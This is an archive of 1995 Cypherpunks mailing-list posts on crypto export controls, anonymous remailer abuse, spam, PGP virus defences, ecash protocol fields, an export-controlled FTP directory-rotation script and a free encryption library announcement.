FrJDF6aktnHoBetKMsaRIFtIC0rXYZCMLktYjTXICPDwZMKWnWy9M5vGYNApS2Rz
DKcZp5UWIIA=
=ZmFv
-----END PGP SIGNATURE-----

----Begin Geek Code---
GAT d- s+:+ a+ C++++ UH++++L++++ P+ L++ E--- W+++ N+ K- w++++ O-- M-- V
PS--- PE+++ Y++ PGP++
t+++ 5+++ X++ !R tv- b+ DI+++ D+ G-- e* h---- r+++ y++++ 
---End Geek Code---







From hallam at w3.org  Mon Nov 20 15:41:42 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 21 Nov 1995 07:41:42 +0800
Subject: "Dear Newt" Letter...
In-Reply-To: <v02120d0facd69dc27ec3@[199.0.65.105]>
Message-ID: <9511202245.AA28548@zorch.w3.org>



Hmm, not sure that it gets us anywhere. The Republicans seem to be even
more keen on wiretap and anti-privacy legislation than the Democrats.
Its called "being tough on crime".

After the airplane seat incident I don't see Newt in the running for 
President so it probably misses the mark. He might slip in a rider on
a bill but if you look at who gets that sort of treatment it correlates
very well with donations, silicon valley seems to be backing Clinton
walet wise.

I would not expect Bob Dole to be resisting pressure from the NSA on this
one more forcefully than Clinton (which let us be clear ain't very
forcefully at all).

I thought the quality of writing rather poor, the points are made in 
polemic, partisan terms which can be made in non-partisan terms. If I
were Newt this letter would say to me "we will vote for you anyway", so
why should Newt bother to pander? The ad hoc ginger groups listed are
a bit odd, the authors are associated with much better known (if
fruitcake) groups.


		Phill





From corey at netscape.com  Mon Nov 20 15:43:42 1995
From: corey at netscape.com (Corey Bridges)
Date: Tue, 21 Nov 1995 07:43:42 +0800
Subject: Spam the Sign!
Message-ID: <199511202259.OAA11521@netscape.com>


Hm. Well, if you think spamming us will help convince the gov't to export
strong crypto, go crazy. (Heck, I don't mind--it makes my job more secure.)

And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
scrolling for the last 3 hours.

Corey Bridges
Security Scribe
Netscape Communications Corporation
415-528-2978






From zerucha at shell.portal.com  Mon Nov 20 15:44:18 1995
From: zerucha at shell.portal.com (Thomas E Zerucha)
Date: Tue, 21 Nov 1995 07:44:18 +0800
Subject: Virus attacks on PGP
In-Reply-To: <199511201945.LAA27486@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.90.951120144320.25327E-100000@jobe.shell.portal.com>


Thanks for the post.  I think there are a few interesting points, and 
some of the things I do to try to make things more difficult for a 
potential virus.

First, my secring is on a PCMCIA memory card, as is the versions of PGP, 
in this case DOS and Linux.  A virus is unlikely to attack both, and when 
the memory card is in, the network and modem cards are out.

Second, I think PGP is statically linked by default.  If it isn't this 
shoudl be changed - there was recently a CERT alert about telnet services 
being compromised by switching DLLs.  The code can also be cross compiled 
and burned onto a CDROM which would make it difficult to infect.

zerucha at shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha at jobe.portal.com for PGP key






From dittrich at cac.washington.edu  Mon Nov 20 15:44:26 1995
From: dittrich at cac.washington.edu (Dave Dittrich)
Date: Tue, 21 Nov 1995 07:44:26 +0800
Subject: (cpx) Re: "Junk E-Mail"
Message-ID: <9511202303.AA23192@red3.cac.washington.edu>


> At 06:47 PM 11/19/95 -0500, you wrote:
> >
> >  Is anyone else getting lots of junk e-mail lately? I'm getting all
> >kinds of direct marketing crap to both of my main accounts and I haven't
> >posted to usenet in months.
> 
>    On a related note, Compuserve had a note on their system last week from
> the sysop.  Their customers are receiving unwanted e-mail advertisements
> from the Internet.  Compuserve sysops are attempting to block the spaming
> but are finding it difficult because the advertiser is coming in via
> different routes.  They are also attempting to stop them using the court
> system.
> 
>    The advertiser, according to the Compuserve sysop, threatened a
> mail-bombing if Compuserve tried to block them!!!  This would be a just
> cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
> response".

Yes, I've noticed these as well.  One troubling thing I noted with one
such spam-handed "attack" was the use of a group of internal email
addresses (in the sense that we don't advertise these addresses) as
addressees for a message that had an analog sent to www-buyinfo and
some other web related addresses.  This seems to indicate a way of
organizing lists into sets based on location/topic, but doesn't
include all other potential addressees in the same domain or
organization.

I guess it was only a matter of time before someone wrote
sophisticated spamming servers that somehow capture/analyze log files,
or is this just some idiot front end that lets ad-happy fools spam
with a smaller apparent footprint?

By the way... One reply I got from an ISP re: one of these drive by
spammings indicated that they were charging the idiot for disobeying
policy.  I've started suggesting to ISPs that they dis-user and charge
the offender (in case they haven't thought of this yet).  If non-spam
policies were more widely used, and these idiots loose their
email/access and a few hundred dollars in charges for wasting ISP
admin time, perhaps this trend won't continue.

-- 
Dave Dittrich                  Client Services, Computing & Communications
dittrich at cac.washington.edu    University of Washington

<a href="http://www.washington.edu/People/dad/">
Dave Dittrich / dittrich at cac.washington.edu</a>





From zerucha at shell.portal.com  Mon Nov 20 15:50:38 1995
From: zerucha at shell.portal.com (Thomas E Zerucha)
Date: Tue, 21 Nov 1995 07:50:38 +0800
Subject: Remailer list or FAQ?
Message-ID: <Pine.SUN.3.90.951120143929.25327D-100000@jobe.shell.portal.com>


Is there a FAQ or other list of anonymous remailers?  Or how to use the 
one at portal.com (I had this info somewhere, but it takes forever to do 
a zgrep `find...).

zerucha at shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha at jobe.portal.com for PGP key






From perry at piermont.com  Mon Nov 20 16:56:30 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 21 Nov 1995 08:56:30 +0800
Subject: "Dear Newt" Letter...
In-Reply-To: <9511202245.AA28548@zorch.w3.org>
Message-ID: <199511210028.TAA15346@jekyll.piermont.com>



hallam at w3.org writes:
> Hmm, not sure that it gets us anywhere. The Republicans seem to be even
> more keen on wiretap and anti-privacy legislation than the Democrats.
> Its called "being tough on crime".

Er, Newt was the one who railed against the Exon censorship bill, and
who's said in public that clipper is unrealistic.

Anyway, there is no observable difference between Republicans and
Democrats on the issue of wiretapping -- most statements that
Republicans are worse are based on wishful thinking by Democratic
sympathizers.

Perry





From jya at pipeline.com  Mon Nov 20 16:58:54 1995
From: jya at pipeline.com (John Young)
Date: Tue, 21 Nov 1995 08:58:54 +0800
Subject: Pix Lox
Message-ID: <199511210034.TAA15743@pipe6.nyc.pipeline.com>


   Bill Gates in "The Road Ahead":

      A complete failure of the information highway is worth
      worrying about. Because the system will be thoroughly
      decentralized, any single outage is unlikely to have a
      widespread effect. If an individual server fails, it
      will be replaced and restored. But the system could be
      susceptible to assault. As the system becomes more
      important, we will have to design in more redundancy.
      One area of vulnerability is the system's reliance on
      cryptography -- the mathematical locks that keep
      information safe.

   Excerpted in Newsweek, November 27, pp. 67-68.

   Rubberneck the roadwreck with Steven Levy in "Bill's New
   Vision."









From dlv at bwalk.dm.com  Mon Nov 20 17:27:16 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 21 Nov 1995 09:27:16 +0800
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <QQzqrd08104.199511201318@tenebrous.uu.net>
Message-ID: <gs5VeD1w165w@bwalk.dm.com>


Joseph Malcolm <jmalcolm at alter.net> writes:
> Dimitri Vulis writes:
> >m5 at dev.tivoli.com (Mike McNally) writes:
> >> Frederick B. Cohen writes:
> >>  > This is baloney.  When you work for Netscape or Sun and speak about you
> >>  > company's products, you are representing the company whether you
> >>  > disclaim it or not.
> >>
> >> Baloney.
> >
> >Fred is right. I used to work for Goldman Sachs & their internet usage polic
> >stated that when you write to Internet or Usenet from a GS account, it will
> >reflect on the firm no matter how you disclaim it.
>
> Dr. Cohen is I believe maintaining it doesn't matter where you write
> from. Note that the Sun employee's message that sparked this was sent
> from a Netcom account.

If that's what Dr. Fred said, then I strongly disagree. (Sorry, I haven't
been following what Dr. Fred said very closely. Can you blame me? :)

Btw, Goldman has a very reasonable Internet use policy that encourages
employees to get accounts on commercial internet providers.

Btw^2, didn't Sun fire someone a couple of years ago for posting a homophobic
joke to Usenet?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From jsimmons at goblin.punk.net  Mon Nov 20 17:49:27 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Tue, 21 Nov 1995 09:49:27 +0800
Subject: Spam the Sign!
In-Reply-To: <199511202259.OAA11521@netscape.com>
Message-ID: <199511210121.RAA02291@goblin.punk.net>


> 
> Hm. Well, if you think spamming us will help convince the gov't to export
> strong crypto, go crazy. (Heck, I don't mind--it makes my job more secure.)
> 
> And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
> scrolling for the last 3 hours.
> 
> Corey Bridges
> Security Scribe
> Netscape Communications Corporation
> 415-528-2978
 
I'm not sure what NWBR's point is, but the original thread he's quoting
was about making the 'evaluation' copies available with 128bit RC4 to
U.S. users.  Jeff Weinstein said that he thought that this was a good idea,
and would see about making it available via an export-controlled ftp
server "once we get government approval".  I was involved in that thread,
since as a Linux user, I can't buy a supported copy, and therefore can't
take advantage of the strong crypto features of the Navigator.

So I would guess that he's spamming YOU to convince YOU to make strong
crypto available.

And as far as needing government approval, I noticed that Sameer has an
export controlled ftp server at c2.org.  Maybe he could tell us what is
necessary to setup such an animal. 

-- 
Jeff Simmons                           jsimmons at goblin.punk.net





From sameer at c2.org  Mon Nov 20 18:03:09 1995
From: sameer at c2.org (sameer)
Date: Tue, 21 Nov 1995 10:03:09 +0800
Subject: Spam the Sign!
In-Reply-To: <199511210121.RAA02291@goblin.punk.net>
Message-ID: <199511210130.RAA26710@infinity.c2.org>


> 
> And as far as needing government approval, I noticed that Sameer has an
> export controlled ftp server at c2.org.  Maybe he could tell us what is
> necessary to setup such an animal. 
> 
> -- 

	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
and sed. I didn't get the NSA to approve it, but I figure if it's good
enough for RSADSI it's good enough for me.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From hfinney at shell.portal.com  Mon Nov 20 18:16:33 1995
From: hfinney at shell.portal.com (Hal)
Date: Tue, 21 Nov 1995 10:16:33 +0800
Subject: remailer abuse
Message-ID: <199511210154.RAA10532@jobe.shell.portal.com>


From: Greg Broiles <greg at ideath.goldenbear.com>
> I think adopting a submissive or apologetic stance with respect to the 
> operation of a remailer is a mistake. What we do is protected by the First
> amendment, supports a 200+ year tradition of anonymous political speech in
> America, provides a valuable service to a worldwide community, and can help
> avoid the very abuse they are accused of facilitating.

The problem is that the time when someone complains about the remailer is
exactly when they have received some obnoxious message.  This is often
their first exposure to the idea of anonymous remailers.  Such people are
the last ones who are going to be receptive or interested in hearing a
lecture about how remailers are protecting the First Amendment.  I
generally do my best to avoid getting into a debate with these people.  I
tell them I have added them to the block list, and usually that is the
end of it.

So while I think Greg's approach is fine as part of an intellectual
debate over the pros and cons of anonymity, it does not address the most
frequent complaints I see as a remailer operator.  I hope that over time
more people will become exposed to the idea of remailers and anonymity
other than in the form of some annoying anonymous message.  Then I think
they will be better able to deal with it when they do get some problem
mail.

> The child who was the
> target of the "Mr. Pedophile" message(s) should have been taught how to use
> remailers and how to maintain his privacy on the net so that, if he really
> is the victim of some sort of random child stalker, it won't happen again.

That message was not posted to Cypherpunks.  It asked in some graphic
detail whether this boy engaged in sexual relations with his parents.
However, the mother was surprisingly calm about it, and simply asked to
be blocked.  The fact that she knew about blocking gave me the
impression she was remailer-savvy, and as I wrote above this seems to
make a big difference.

Hal





From jya at pipeline.com  Mon Nov 20 18:35:53 1995
From: jya at pipeline.com (John Young)
Date: Tue, 21 Nov 1995 10:35:53 +0800
Subject: HOR_mel
Message-ID: <199511201509.KAA03155@pipe4.nyc.pipeline.com>


   11-20-95. Washrag:


   "It's the Spam You Read That's Making Many Interneters
   Queasy."

      It's squarely at odds with Internet culture. And an on-
      line mass mailer is drafting a lawsuit against a
      spammer, advised by Stewart A. Baker, former general
      counsel to the NSA. Having taken plenty of flak on the
      Internet for defending a Clinton administration proposal
      on encryption, Baker is pleased to be working on an
      issue so dear to the heart of the 'Net community. "It's
      not every day that you come to the office humming a
      tune," Baker said. "But working on this case, I do."


   11-20-95. W$Joker:

   "Why Many Businesses Can't Keep Their Secrets."

      Personal computers are the biggest contributors to the
      security headaches of companies. "Computer technology
      has enhanced the control and power of the individual
      employee to a level that transcends what was customary
      in the traditional workplace." Many experts see a
      correlation between recent leaks and the decline in
      workers' loyalty to employers, falling job security and
      increased workloads. The media have played a part as
      well by becoming more aggressive over the past three
      decades about challenging institutions and exposing
      scandal. This makes it "more possible for an employee to
      have his 15 minutes of fame" by waving his boss's
      victorias.

      Just what suffices legally as a reasonable precaution in
      a frontier developing as rapidly as computer technology
      isn't clear yet. For instance, requiring passwords for
      access to a computer system, once considered a
      reasonable precaution, now isn't enough. That's why
      consultants are recommending periodic internal audits to
      test for computer-system penetration and compliance with
      documented security policies.


   2: HOR_mel  (14 kb)













From attila at primenet.com  Mon Nov 20 19:13:26 1995
From: attila at primenet.com (attila)
Date: Tue, 21 Nov 1995 11:13:26 +0800
Subject: Detweiler and his theory of "Budding Nazism"
In-Reply-To: <199511202005.MAA25006@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951121015310.16797A-100000@usr2.primenet.com>



 It probably is not worth the aggravation, but ignorant, both poltically and 
as to the charter of cypherpunks, assholes like Detweiler need to be set 
straight.  Since I doubt Detweiler is open to discussion --small minds 
rarely are, we might _very_ politely suggest to the editors of Time, NYT, 
and a couple others that Detweiler is not only misinformed, but that he 
is not open to discussion.  Enough _polite_ letters to the editors can do 
wonders.
________________________________________________________________________
On Mon, 20 Nov 1995, Hroller Anonymous Remailer wrote:

> The other anonymous poster was referring to Detweiler's
> belief that cryptoanarchy was a budding Nazism as one
> of his apparent motivations. After a little bit of 
> amateur Detweiler study I can agree with this. 
> 
> His page at http://www.csn.net/~ldetweil/ has sections that
> emphasize his concern about cryptoanarchy as a kind of
> "neo-nazism". Thankfully the cryptoanarchist sentiments
> on this list are much different than nazism in the way
> it advocates complete disengagement from the political
> process, something that tended to make the Nazist agenda
> highly dangerous. Without that you just have a bunch of
> subversive guerillas. Like gnats, irritating but irrelevant.
> 
> So as long as we stick with the non-political advocation,
> and stay disorganized, and don't ever amount to anything
> significant as far as visible political clout, I think
> Detweiler is generally going to continue to leave us alone,
> thank God.
> 
> 





From carolann at censored.org  Mon Nov 20 19:28:25 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Tue, 21 Nov 1995 11:28:25 +0800
Subject: Happy Thanksgiving L. Detweiller!
Message-ID: <199511210254.TAA12709@mailhost1.primenet.com>


And to all of your tentacles,

And to all of you on The Cypherpunk List.

Love Always,

Carol Anne
ps Is that L for Laura or Lori?
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From hfinney at shell.portal.com  Mon Nov 20 20:55:56 1995
From: hfinney at shell.portal.com (Hal)
Date: Tue, 21 Nov 1995 12:55:56 +0800
Subject: Cyberpunk handbook
Message-ID: <199511210436.UAA26114@jobe.shell.portal.com>


You Bay Area people probably know all about this already, but I was
browsing through the local bookstore yesterday and saw Eric Hughes,
Cypherpunks co-founder, on the cover of the "Cyberpunk [sic] Handbook",
a slim satirical volume by the Mondo 2000 people.  The book has more
attitude than information, though.

Hal





From rsalz at osf.org  Mon Nov 20 21:03:11 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 21 Nov 1995 13:03:11 +0800
Subject: Export control FTP servers
Message-ID: <9511210441.AA26515@sulphur.osf.org>


>	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
>and sed. I didn't get the NSA to approve it, but I figure if it's good
>enough for RSADSI it's good enough for me.

I believe some of the following has been posted here before.
The person to speak with is
	John Sonderman
	Office of Defense Trade
	Department of Compliance
	703 875 6644
He's supposed to be Internet-aware.   What's not common knowledge is
that he's leaving by early December for budgetary reasons.  If you're
thinking of putting export controlled stuff up for FTP, you should
probably contact John now.
	/r$





From iang at cory.EECS.Berkeley.EDU  Tue Nov 21 13:47:02 1995
From: iang at cory.EECS.Berkeley.EDU (Ian Goldberg)
Date: Tue, 21 Nov 95 13:47:02 PST
Subject: ecash protocol: Part 1
Message-ID: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>


Well, I dropped off the net for a few days due to a midterm, but I'm
back now...

Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
I have a binary, which I can't even run...).  

I've managed to decipher a useful bit of the first message sent from
the shop to the payer.  It's the Payment Request, and contains the following
information:

o Header identifying packet as Payment Request
o The integer 4
o The payment amount, in cents
o The time (seconds since 1970)
o The integer 79
o The name of the shop (payee)
o A description of the item being paid for
o An empty string
o The integer 0
o End of Record marker

I don't know what the 4, 79, empty string, and 0 are for.  I assume one
of them (probably the 4) is some indication of currency (US cents).
I can provide a byte-level description of the record, if people want.

I guess the important bit is that the payee, the item being bought,
and the cost are sent _in the clear_.  Some of the people I've talked
to think this is a huge privacy breach, and some don't.  You all can
debate this now.  Lucky can, if he wishes, add insight, and/or tell us
what DC may do about this.

I'll try to figure out the rest of the fields, and some of the other
messages (like the payment itself).

   - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
	    the source?"




From frissell at panix.com  Tue Nov 21 13:51:04 1995
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 21 Nov 95 13:51:04 PST
Subject: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <199511212150.QAA02220@panix.com>


At 11:05 AM 11/21/95 -0500, Peter Wayner wrote:

>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening? Doesn't a court ordered wire tap
>require that people listen in and screen the recordings. Does

No.  Automatic equipment (pen registers) is almost as old as wiretaps.

>12,500 agents would cost $1.2 bill
on a year if they each cost
>about $100,000 in salary and benefits. But we need to account
>for vacations, shift work and testifying the trials of the drug
>lords who are sent to jail. Let's assume that you only need
>1/10th the people to handle the two evening shifts. That gives
>you a cost of $1.4 billion before vacations. Adding 40% to cover
>vacation and weekends puts you close to $2 billion. Let's round
>up.

The bodies are still needed for management, analysis, arrest, prosecution,
and punishment.  Until Robocop is deployed, the criminal justice system will
be a labor intensive effort.  This is still good news for us though.  Anyone
who's been in business (say George McGovern after his Connecticut inn
bankruptcy) can tell you that people are the most expensive part of a
business.  You pay all that cash each year and at the end of the year you
have nothing concrete to show for it.  You are just buying time.  Labor
costs become more of a problem as the quantity and value of capital goods
increases since the more slowly increasing factor (labor) is bid up.  Thus
people cost a lot more these days than they did in 1800 because capital
goods (per unit) are much cheaper than they used to be.

(Ignore temporary changes in returns to labor as women, 3rd world residents,
or freed commie slaves join the labor force.  They are quickly absorbed.
Wants are unlimited.)

Now the increasing cost of labor is not a problem if those workers are
producing goods of value.  They are "making" their own earnings.  If they
are in a parasitic profession, however, -- one that subsists on what it
steals from others -- the rising cost of labor means that that institution
has to steal more and more to keep up.  Eventually, the speed of economic
change can swamp the theft ability of such an organization.

Such swamping occurs because market entities support their own growth or
they don't grow.  Since they lift themselves up, growth is unlimited.
Parasitic entities on the other hand are limited by the strength and
susceptibility of their host.  Hosts may weaken if the parasite grows too
much or it may find a way to cast off the parasite.  No one rejects a market
economic actor that is a potential customer or employer but parasites are
rejected whenever possible.

Market Earth on the nets gives us many opportunities to both fuel fast
growth and shake off parasites.  It is perfectly possible for markets to
outbid the secret police for the labor of its agents given the compound
growth rates that are a feature of friction-free capitalism.

DCF

"Don't call it Anarchy.  Call it Disintermediation."






From anonymous-remailer at shell.portal.com  Mon Nov 20 23:58:31 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 21 Nov 1995 15:58:31 +0800
Subject: Java & Netscape security [NOISE]
Message-ID: <199511210731.XAA08374@jobe.shell.portal.com>


On Fri, 17 Nov 1995, Dr. Dimitri Vulis wrote:

> m5 at dev.tivoli.com (Mike McNally) writes:
> > Frederick B. Cohen writes:
> >  > This is baloney.  When you work for Netscape or Sun and speak about
> >  > your company's products, you are representing the company whether you
> >  > disclaim it or not.
> >
> > Baloney.
>
> Fred is right. I used to work for Goldman Sachs & their internet usage
> policy stated that when you write to Internet or Usenet from a GS account,
> it will reflect on the firm no matter how you disclaim it.

I think this is true, and is where we start to get into reputations and
trust. 

If someone from Goldman Sachs posts to a Usenet group discussing abortion
or gun-control, and says that: "These opinions are my own and not my
employers."  Then, we can accept that, no matter how silly their opinions
are. 

But there is a difference in the way we look at it if someone from Goldman
Sachs posts to misc.invest.stocks instead and says that the Goldman Sachs
Strip Coupon Fund is better than the one from Merrill Lynch -- that it's
safer and produces higher returns because Goldman uses cubic spline
interpolation methodologies to interpolate the yield curve, while Merrill
Lynch doesn't.  There is a difference here. 

In the first case, the poster is not commenting about anything to do with
their work, -- it really is just one man's opinion -- while in the second
they are actually commenting upon something their employer is selling. 

If the employee tries to add, "these opinions are my own, and do not
reflect the opinion of my employer" then we have a huge credibility
problem. 

You really can't have it both ways.  You can't post officially and
unofficially at the same time, unless it really does have nothing to do
with your work. 

If you post from Sun Engineering, and you are posting to a group that
focuses on Sun, and you are talking about a Sun product, then people are
going to take your comments as an official statement from Sun. You are
that product's spokesperson, whether you disclaim or not, and should act
accordingly.  No matter what, that's the way people are going to see it. 

It's a huge responsibility ... it's not like speaking candidly at an open
Member's table at the Rideau Club or anything, like that. 

Sun and Netscape and AT&T should know this.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.










From frantz at netcom.com  Tue Nov 21 00:00:58 1995
From: frantz at netcom.com (Bill Frantz)
Date: Tue, 21 Nov 1995 16:00:58 +0800
Subject: Virus attacks on PGP
Message-ID: <199511210732.XAA04912@netcom18.netcom.com>


At 14:52 11/20/95 -0800, Thomas E Zerucha wrote:
>... The code can also be cross compiled 
>and burned onto a CDROM which would make it difficult to infect.

Certainly having PGP run from a CDROM or other read-only device would be a
big help.  Even better would be to have all the privileged code also run
from a read-only device.


Bill Frantz







From attila at primenet.com  Tue Nov 21 01:24:19 1995
From: attila at primenet.com (attila)
Date: Tue, 21 Nov 1995 17:24:19 +0800
Subject: Export control FTP servers
In-Reply-To: <9511210441.AA26515@sulphur.osf.org>
Message-ID: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>



well, since it is "official" policy and the basics concern rejecting all 
foreign addresses and making the proposed recipient agree to a file 
statement agreeing not to export and that he/she/it is an American or 
Canadian citizen, it might be nice if someone who has the `sed ....`
and/or `awk...` scripts would post them for all to use (with whatever 
disclaimers, etc.)

On Mon, 20 Nov 1995, Rich Salz wrote:

> >	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> >and sed. I didn't get the NSA to approve it, but I figure if it's good
> >enough for RSADSI it's good enough for me.
> 
> I believe some of the following has been posted here before.
> The person to speak with is
> 	John Sonderman
> 	Office of Defense Trade
> 	Department of Compliance
> 	703 875 6644
> He's supposed to be Internet-aware.   What's not common knowledge is
> that he's leaving by early December for budgetary reasons.  If you're
> thinking of putting export controlled stuff up for FTP, you should
> probably contact John now.
> 	/r$
> 





From sameer at c2.org  Tue Nov 21 01:28:37 1995
From: sameer at c2.org (sameer)
Date: Tue, 21 Nov 1995 17:28:37 +0800
Subject: Export control FTP servers
In-Reply-To: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>
Message-ID: <199511210906.BAA04152@infinity.c2.org>


#!/bin/sh
umask 022
DIRNAME=`cat $HOME/.usonlydir`
NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
cd /u1/ftp/pub/US-only
mv I_will_not_export_$DIRNAME I_will_not_export_$NEWDIRNAME
cd ..
sed -e "s/$DIRNAME/$NEWDIRNAME/" < README.US-only > README.new
mv README.new README.US-only
echo $NEWDIRNAME > $HOME/.usonlydir


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From rsalz at osf.org  Tue Nov 21 03:34:37 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 21 Nov 1995 19:34:37 +0800
Subject: "Junk E-Mail"
Message-ID: <9511211114.AA26914@sulphur.osf.org>


>RICO is very serious stuff.  Criminal prosecution under the terms of the

Like Operation Rescue?

Wrong again, Alice.





From anonymous-remailer at shell.portal.com  Tue Nov 21 03:48:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 21 Nov 1995 19:48:10 +0800
Subject: "Junk E-Mail"
Message-ID: <199511210955.BAA16150@jobe.shell.portal.com>


On Mon, 20 Nov 1995 hallam at w3.org wrote:


> I think it would be better to slap a RICO suit onto the company
> concerned. It sound to me like an attempt to gain financial advantage
> through threatening behaviour. Where I come from that means jail time. 

RICO is very serious stuff.  Criminal prosecution under the terms of the
Racketeer-Influenced & Corrupt Organizations Act is reserved for very
serious situations indeed.  It's true "rubber hose" stuff. 

It was intended as a tool for use against mobsters, but US attorneys have
used it against white-collar criminals.  I think, you'd have to have
strong evidence of an ongoing "criminal enterprise", which I don't think
you have with junk e-mail. 

I doubt that there are many experts in RICO as it applies to computer law. 

I really don't know if the laws pertaining to breaches of computer
security would be applicable, or not, or how RICO really does work or fit. 
Although the armchair solicitor in me might speculate that you'd have to
show some form of organized collusion or somesuch to breach computer or
network integrity to prosecute under RICO.  And you'd have to show -- I'm
uncertain if the standard is beyond a reasonable doubt or not -- that it
was at some point willful and well-organized. 

I suppose that is a moot point though, when we're talking about pre-trial
forfeiture of all assets -- right down to the food in the refrigerator.  I
doubt at that point that a trial would be forthcoming.  It really does
reinforce the maxim, that it's best not to fight a battle that you cannot
win.  

RICO is very persuasive that way. 

I'm certain that there will be those who would say that it's not
administratively possible to apply RICO to this situation.  Most legal
advisers would probably say that it can't be done, but I suppose then,
that would be the time for the clarion call, "Then get me a lawyer who
says it CAN be done." 

Personally, however, I'm unconvinced, and would defer to those much more
knowledgable in such matters.  

Although, in all honesty, RICO and computer networks in the same sentence
literally scares the be-jeebers outta me. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From enzo at ima.com  Tue Nov 21 03:55:14 1995
From: enzo at ima.com (Enzo Michelangeli)
Date: Tue, 21 Nov 1995 19:55:14 +0800
Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows (fwd)
Message-ID: <Pine.LNX.3.91.951121193458.8471B-100000@ima.net>


Found on sci.crypt, apparently not yet posted on this list. I haven't 
examined it at all, caveat emptor. The size of the ZIP file is about 148 Kb.

Enzo

---------- Forwarded message ----------
Path: news.hklink.net!hpg30a.csc.cuhk.hk!cuhknntp!news.uoregon.edu!cs.uoregon.edu!reuter.cse.ogi.edu!hp-cv!hp-pcd!sdd.hp.com!swrinde!newsfeed.internetmci.com!in1.uu.net!brighton.openmarket.com!decwrl!waikato!auckland.ac.nz!news
From: pgut01 at cs.auckland.ac.nz (Peter Gutmann)
Newsgroups: alt.security,comp.security.misc,sci.crypt
Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows
Date: 20 Nov 1995 09:57:45 GMT
Organization: University of Auckland
Lines: 45
Sender: pgut01 at cs.auckland.ac.nz (Peter Gutmann)
Message-ID: <48pjep$7ge at net.auckland.ac.nz>
NNTP-Posting-Host: cs26.cs.auckland.ac.nz
X-Newsreader: NN version 6.5.0 #3 (NOV)
Xref: news.hklink.net alt.security:6498 comp.security.misc:5814 sci.crypt:6827


[This was announced a few days ago, I've reposted it to a few crypto and 
 security groups for people who don't read the archives groups]
 
File name: ftp://garbo.uwasa.fi/pc/security/cryptl99.zip
One line description: Free encryption library for Unix/DOS/Windows
 
This encryption library provides a universal interface to a number of 
conventional-key encryption algorithms.  The library currently supports 
encryption algorithms and modes of MDC/SHS CFB, DES ECB, CBC, CFB, OFB, PCBC, 
triple DES ECB, CBC, CFB, OFB, IDEA ECB, CBC, CFB, OFB, RC4, SAFER ECB, CBC, 
CFB, OFB, and SAFER-SK ECB, CBC, CFB, OFB.  All encryption routines are 
accessed through a single standardised interface with parameters such as 
algorithm, mode and key size being selectable by the user.  The library is 
supplied as source code for Unix, DOS, and the Amiga, and as dynamic link 
libraries for Windows and Windows NT.
 
The design goal for the library was to create an easy-to-use, standardised 
interface to a number of popular encryption algorithms.  Like the standard C 
file I/O libraries which work with FILE objects, this library works with an 
"encryption context" of type CRYPT_INFO.  To encrypt data, you create an 
encryption context, load a user key into it, en/decrypt data, and destroy it 
when you've finished.  This concept lends itself to implementation either as a 
C++ class or as C routines.
 
The library has been written to be as idiot-proof as possible.  On 
initialization it performs extensive self-testing against test data from 
encryption standards documents, and the API's check each parameter and 
function call for errors before any actions are performed, with error 
reporting down to the level of individual parameters.
 
The library API serves as an interface to a range of plug-in encryption 
modules which allow encryption algorithms to be added in a fairly transparent 
manner.  The standardised API allows any of the algorithms and modes supported 
by the library to be used with a minimum of coding effort.  As such the main 
function of the library is to provide a standard, portable, easy-to-use 
interface between the underlying encryption routines and the user software.
 
